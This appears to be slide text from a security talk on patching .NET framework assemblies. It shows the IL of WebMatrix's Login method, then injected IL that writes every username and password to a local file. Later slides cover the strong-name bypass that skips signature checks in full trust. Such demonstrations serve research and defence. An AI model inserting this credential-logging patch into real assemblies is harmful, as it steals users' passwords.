  • 11. .method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed { .param [3] = bool(false) // Code size .maxstack 26 (0x1a) 2 .locals init (bool V_0) IL_0000: call IL_0005: pop IL_0006: ldarg.0 IL_0007: class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider() ldarg.1 IL_0008: call bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string) IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: brfalse.s IL_0011: ldarg.0 IL_0012: ldarg.2 IL_0018 IL_0013: call void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool) IL_0018: ldloc.0 IL_0019: ret } // end of method WebSecurity::Login
  • 12. // OK, let's be a little evil IL_00XX: nop IL_00XX: ldstr "C:UsersPublicmylog.txt" IL_00XX: ldarg.0 // get the username IL_00XX: ldstr "," IL_00XX: ldarg.1 // get the password IL_00XX: ldstr "rn" // set the data (concatenate the pervious strings) IL_00XX: call string System.String::Concat(string,string,string,string) // write the data IL_00XX: call void [mscorlib]System.IO.File::AppendAllText(string, string) IL_00XX: nop
  • 13. Protection • Local Runtime? • Signature Checking?
  • 14. Progress? Starting with the .NET Framework 3.5 Service Pack 1, strong-name signatures are not validated when an assembly is loaded into a full-trust application domain, such as the default application domain for the MyComputer zone. This is referred to as the strong-name bypass feature. In a full-trust environment, demands for StrongNameIdentityPermission always succeed for signed, full-trust assemblies, regardless of their signature. The strong-name bypass feature avoids the unnecessary overhead of strong-name signature verification of full-trust assemblies in this situation, allowing the assemblies to load faster. http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx
  • 16. o_O .method assembly hidebysig static class System.Reflection.RuntimeAssembly InternalLoadAssemblyName( class System.Reflection.AssemblyName assemblyRef, class System.Security.Policy.Evidence assemblySecurity, class System.Reflection.RuntimeAssembly reqAssembly, valuetype System.Threading.StackCrawlMark& stackMark, native int pPrivHostBinder, bool throwOnFileNotFound, bool forIntrospection, bool suppressSecurityChecks) cil managed { method logic…